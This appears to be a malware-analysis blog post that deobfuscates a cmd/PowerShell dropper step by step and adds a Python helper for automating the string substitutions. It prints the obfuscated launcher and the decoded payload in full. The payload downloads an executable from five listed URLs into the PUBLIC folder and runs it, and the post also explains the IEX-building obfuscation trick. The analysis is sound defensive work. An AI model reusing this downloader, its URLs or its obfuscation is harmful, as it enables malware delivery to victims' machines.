set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBx'-JoiN'')'' 

(
(
'aEsD''B'1f''ra''nc ''= ''new''''-''osD''B'''bje''c''t'' Syste''m.Ne''''''t''.''We''bClie''nts''DB''';''aE1n''sadasd'' =s''DBsD''B ''newsD''B'-obje''ct r''a''nd''o''m'';aE1b''c''d ='' Dsph''t''tp://''ww'sD''Bw.''mesD''B'di''cis''DB'ns''DB'es''DB'dists''DB'ributor.com/''UVR''J/,h''ttpsD''B':/''/''www.shopnz.in/fg/,''ht's''DBtp''://c''a''b''letvinternet''.u''s/fF''QiRYu/,htt''''p://www''''.''dongho''din''hvi''''gps.co''m/h/,''http://aj''a''x''tu''be.''co'''sD3G''j'Bm/tF''UIADP''/D''sp.Split(Ds''''p'',''D''sp)'s''DB;aE1kara''pa''s'sD''B = ''aE''1ns''adasd.n''ext(''1, 343245);aE''1huas = aE1e'sD''Bn''v:''''pub''l''ic '''''' Dsp''7H5''''''Dsp  aE1karap''as  s''DB'D''s''p.exeDsp;''fo''reach''(aE''1''a''bc in aE1''bcds''DB'){tr''y''{aE''1fr''asD''B'n''c.''Downl''''''oadFi''l''e(aE''1a''b''c.T''oSt'sD''Bri''ng(), aE1''hua''''s);In''3''Gj'voke-It''''em(''a''E1''''h''ua''s)'';brea''''k'';}cat''ch{w''''r''i''te-host aE1_.Ex''ception's''DB.''Message'''';}}'
)
.REpLacE('Dsp',[''s''trI''ng][cH''Ar]39).REpLacE(([c''HAr]55[cHAr]72[cHAr]5''3),'\''').REpLacE('aE1','''$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Replaced all instances of Dsp with ' (single quote character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBx'-JoiN'')'' 

(
(
'aEsD''B'1f''ra''nc ''= ''new''''-''osD''B'''bje''c''t'' Syste''m.Ne''''''t''.''We''bClie''nts''DB''';''aE1n''sadasd'' =s''DBsD''B ''newsD''B'-obje''ct r''a''nd''o''m'';aE1b''c''d ='' 'h''t''tp://''ww'sD''Bw.''mesD''B'di''cis''DB'ns''DB'es''DB'dists''DB'ributor.com/''UVR''J/,h''ttpsD''B':/''/''www.shopnz.in/fg/,''ht's''DBtp''://c''a''b''letvinternet''.u''s/fF''QiRYu/,htt''''p://www''''.''dongho''din''hvi''''gps.co''m/h/,''http://aj''a''x''tu''be.''co'''sD3G''j'Bm/tF''UIADP''/D''sp.Split(Ds''''p'',''D''sp)'s''DB;aE1kara''pa''s'sD''B = ''aE''1ns''adasd.n''ext(''1, 343245);aE''1huas = aE1e'sD''Bn''v:''''pub''l''ic '''''' '''7H5'''''''  aE1karap''as  s''DB'D''s''p.exe';''fo''reach''(aE''1''a''bc in aE1''bcds''DB'){tr''y''{aE''1fr''asD''B'n''c.''Downl''''''oadFi''l''e(aE''1a''b''c.T''oSt'sD''Bri''ng(), aE1''hua''''s);In''3''Gj'voke-It''''em(''a''E1''''h''ua''s)'';brea''''k'';}cat''ch{w''''r''i''te-host aE1_.Ex''ception's''DB.''Message'''';}}'
)
.REpLacE('Dsp',[''s''trI''ng]').REpLacE((7H5),'\''').REpLacE('aE1','''$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Replaced all instances of 7H5 with \ (backslash character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$ver''BosePr''EFErence)[1,3]s''DBx'-JoiN'')'' 

(
(
'aEsD''B'1f''ra''nc ''= ''new''''-''osD''B'''bje''c''t'' Syste''m.Ne''''''t''.''We''bClie''nts''DB''';''aE1n''sadasd'' =s''DBsD''B ''newsD''B'-obje''ct r''a''nd''o''m'';aE1b''c''d ='' 'h''t''tp://''ww'sD''Bw.''mesD''B'di''cis''DB'ns''DB'es''DB'dists''DB'ributor.com/''UVR''J/,h''ttpsD''B':/''/''www.shopnz.in/fg/,''ht's''DBtp''://c''a''b''letvinternet''.u''s/fF''QiRYu/,htt''''p://www''''.''dongho''din''hvi''''gps.co''m/h/,''http://aj''a''x''tu''be.''co'''sD3G''j'Bm/tF''UIADP''/D''sp.Split(Ds''''p'',''D''sp)'s''DB;aE1kara''pa''s'sD''B = ''aE''1ns''adasd.n''ext(''1, 343245);aE''1huas = aE1e'sD''Bn''v:''''pub''l''ic '''''' '''\'''''  aE1karap''as  s''DB'D''s''p.exe';''fo''reach''(aE''1''a''bc in aE1''bcds''DB'){tr''y''{aE''1fr''asD''B'n''c.''Downl''''''oadFi''l''e(aE''1a''b''c.T''oSt'sD''Bri''ng(), aE1''hua''''s);In''3''Gj'voke-It''''em(''a''E1''''h''ua''s)'';brea''''k'';}cat''ch{w''''r''i''te-host aE1_.Ex''ception's''DB.''Message'''';}}'
)
.REpLacE('Dsp',[''s''trI''ng]').REpLacE((7H5),'\''').REpLacE('aE1','''$s'3G''jDB) ''
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Manually removed all '' (doubled single quote characters) ***
*** Re-replaced 3Gj with ' (single quote character) ***
*** Re-replaced sDB with ' (single quote character) ***
*** Re-replaced Dsp with ' (single quote character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$verBosePrEFErence)[1,3]'x'-JoiN) 

(
(
'aE1franc = new-object System.Net.WebClient;aE1nsadasd = new-object random;aE1bcd = 'http://www.medicinedistributor.com/UVRJ/,http://www.shopnz.in/fg/,http://cabletvinternet.us/fFQiRYu/,http://www.donghodinhvigps.com/h/,http://ajaxtube.com/tFUIADP/'.Split(','');aE1karapas = aE1nsadasd.next(1, 343245);aE1huas = aE1env:public  '\'  aE1karapas  '.exe';foreach(aE1abc in aE1bcd){try{aE1franc.DownloadFile(aE1abc.ToString(), aE1huas);Invoke-Item(aE1huas);break;}catch{write-host aE1_.Exception.Message;}}'
)
.REpLacE('Dsp',[strIng]').REpLacE((7H5),'\').REpLacE('aE1','$') 
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

*** Replaced all instances of aE1 with $ (dollar sign character) ***

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
( 
(

(' 

(
(' & ( ([sTriNG]$verBosePrEFErence)[1,3]'x'-JoiN) 

(
(
'$franc = new-object System.Net.WebClient;$nsadasd = new-object random;$bcd = 'http://www.medicinedistributor.com/UVRJ/,http://www.shopnz.in/fg/,http://cabletvinternet.us/fFQiRYu/,http://www.donghodinhvigps.com/h/,http://ajaxtube.com/tFUIADP/'.Split(','');$karapas = $nsadasd.next(1, 343245);$huas = $env:public  '\'  $karapas  '.exe';foreach($abc in $bcd){try{$franc.DownloadFile($abc.ToString(), $huas);Invoke-Item($huas);break;}catch{write-host $_.Exception.Message;}}'
)
.REpLacE('Dsp',[strIng]').REpLacE((7H5),'\').REpLacE('$','$') 
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB','
)
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

Once all the different items were cleaned up from the script, I ended up with the following.

cmd   wmic   &   %comspec%       /v        /c       
set %mTozMmVOmbRzBfT%=EoRfELTbX&&
set %JLUNwakct%=o^w^e^r^s&&set %LGsjYrTcMLwIEKw%=zzzAAsbLA&&
set %fwbPvzwZR%=p&&
set %cjfjGhDSrRlFuop%=uHokpjKAdUfGLTb&&
set %XZGDjkTXd%=^h^e^l^l&&
set %ikvsDsMkWiIfRmY%=qEIKFtDqWTRfBOa&&!%fwbPvzwZR%!!%JLUNwakct%!!%XZGDjkTXd%!  "& ( $ENv:COmSpeC[4,26,25]-Join'')
// set %ikvsDsMkWiIfRmY%=powershell" & ( $ENv:COmSpeC[I,E,X]-Join'')

( 
(

(' 

(
(' & ( ([sTriNG]$verBosePrEFErence)[1,3]'x'-JoiN) 

(
(
'$franc = new-object System.Net.WebClient;
$nsadasd = new-object random;
$bcd = 'http://www.medicinedistributor.com/UVRJ/,http://www.shopnz.in/fg/,http://cabletvinternet.us/fFQiRYu/,http://www.donghodinhvigps.com/h/,http://ajaxtube.com/tFUIADP/'.Split(','');
$karapas = $nsadasd.next(1, 343245);
$huas = $env:public  '\'  
$karapas  '.exe';
	foreach($abc in $bcd)
		{try{$franc.DownloadFile($abc.ToString(), $huas);
		Invoke-Item($huas);
		break;}
	catch{write-host $_.Exception.Message;}}'
)
.REpLacE('Dsp',[strIng]').REpLacE((7H5),'\').REpLacE('$','$') 
)
'
)
-cREpLaCe'mQe',''$ -REplAce  '''\',\ -REplAce 'sDB',')
| .( $SHEllId[1]''$shElL''id[13]'x')')  -cREplACe  (tiQ,$-REPLacE'3Gj','-REPLacE(PBw),|)
)
)

As for the script, indexing the ComSpec environment variable with “[4,26,25]” and joining the result pulls the characters I, e and x out of the string “C:\WINDOWS\system32\cmd.exe” (remember that indexing starts at 0) and builds IEX, the alias for Invoke-Expression, which runs a string as a PowerShell command (http://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-5.1). That is what executes the decoded script, which in turn “fetches” the binary from the URLs listed. The URLs are loaded into an array, and the script loops over it, trying to download the malicious binary from each one and stopping at the first that succeeds. The binary is saved in the “PUBLIC” folder under a randomly generated numeric name with ‘.exe’ appended.
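The substitution chain walked through above can be automated, and doing so makes one detail of the manual process obvious: sDB, Dsp and 3Gj had to be replaced a second time because stripping the doubled quotes rejoins tokens the obfuscator had split (sD''B becomes sDB). The Python below is an added example written for this post, not code from the original write-up or from the maldoc itself. It applies the same chain the walkthrough used, repeating it until the text stops changing, and it resolves the index-and-join trick for the three places the script spells out “iex” (ComSpec with [4,26,25], $VerbosePreference with [1,3] plus 'x', and $ShellId with [1] and [13] plus 'x'). The ComSpec value is the one quoted above; the $VerbosePreference and $ShellId values are the Windows PowerShell defaults on an English host and are assumptions. The obfuscated sample string is constructed for the example and is not the real payload.

```python
# Added example (not from the original post or the maldoc): automating the
# manual substitution chain from the walkthrough and resolving the
# index-and-join tricks the script uses to spell "iex" without writing it.
from typing import Dict, List, Tuple

# Values assumed for the variables the script indexes into. ComSpec is the
# string the walkthrough quotes; the other two are the Windows PowerShell
# defaults on an English host (assumption).
KNOWN_STRINGS: Dict[str, str] = {
    "$env:ComSpec": r"C:\WINDOWS\system32\cmd.exe",
    "$VerbosePreference": "SilentlyContinue",
    "$ShellId": "Microsoft.PowerShell",
}


def resolve_index_join(variable: str, indices: List[int], suffix: str = "") -> str:
    """Reproduce `$var[i,j,...] -Join ''` plus any literal appended after it."""
    source = KNOWN_STRINGS[variable]
    return "".join(source[i] for i in indices) + suffix


def chars_from_codes(codes: List[int]) -> str:
    """Reproduce `[char]55[char]72[char]53` style literals (here: '7H5')."""
    return "".join(chr(c) for c in codes)


# The substitution chain, in the order the walkthrough applied it: mQe and
# 7H5 become a backslash; sDB, Dsp and 3Gj become a single quote; doubled
# quotes are dropped; aE1 becomes the variable sigil.
REPLACEMENTS: List[Tuple[str, str]] = [
    ("mQe", "\\"),
    ("sDB", "'"),
    ("Dsp", "'"),
    ("7H5", "\\"),
    ("''", ""),
    ("3Gj", "'"),
    ("aE1", "$"),
]


def deobfuscate(blob: str) -> Tuple[str, int]:
    """Apply the chain repeatedly until the text stops changing.

    One pass is not enough: dropping the doubled quotes rejoins tokens the
    obfuscator split (sD''B -> sDB), so the token substitutions must run
    again. Returns the cleaned text and the number of passes that changed it.
    """
    passes = 0
    while True:
        before = blob
        for token, replacement in REPLACEMENTS:
            blob = blob.replace(token, replacement)
        if blob == before:
            return blob, passes
        passes += 1


# Constructed sample in the maldoc's style (not the real payload): paired
# sDBsDB tokens, a split sD''B token, a split 3''Gj token, and 7H5 standing
# in for the path separator.
SAMPLE_BLOB = (
    "aE1c = new-objesDBsDBct SystesD''BsDBm.Net.WebClient;"
    "aE1p = aE1env:public + Dsp7H5Dsp + aE1n + Dsp.exeDsp;"
    "Wr3''GjsDBite-Host aE1p"
)

if __name__ == "__main__":
    cleaned, passes = deobfuscate(SAMPLE_BLOB)
    print(f"{passes} passes: {cleaned}")
    for var, idx, sfx in (("$env:ComSpec", [4, 26, 25], ""),
                          ("$VerbosePreference", [1, 3], "x"),
                          ("$ShellId", [1, 13], "x")):
        print(f"{var}{idx} -> {resolve_index_join(var, idx, sfx)}")
    print("[char]55[char]72[char]53 ->", chars_from_codes([55, 72, 53]))
```

Running it on the constructed sample takes two changing passes and yields `$c = new-object System.Net.WebClient;$p = $env:public + '\' + $n + '.exe';Write-Host $p`. The ComSpec lookup gives “Iex” with a capital I, which PowerShell accepts because command lookup is case-insensitive; the other two lookups give “iex” directly. The fixpoint loop is the practical lesson: when a layered obfuscator splits its own marker tokens, run the whole substitution set again after every quote-stripping step rather than trusting a single pass.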
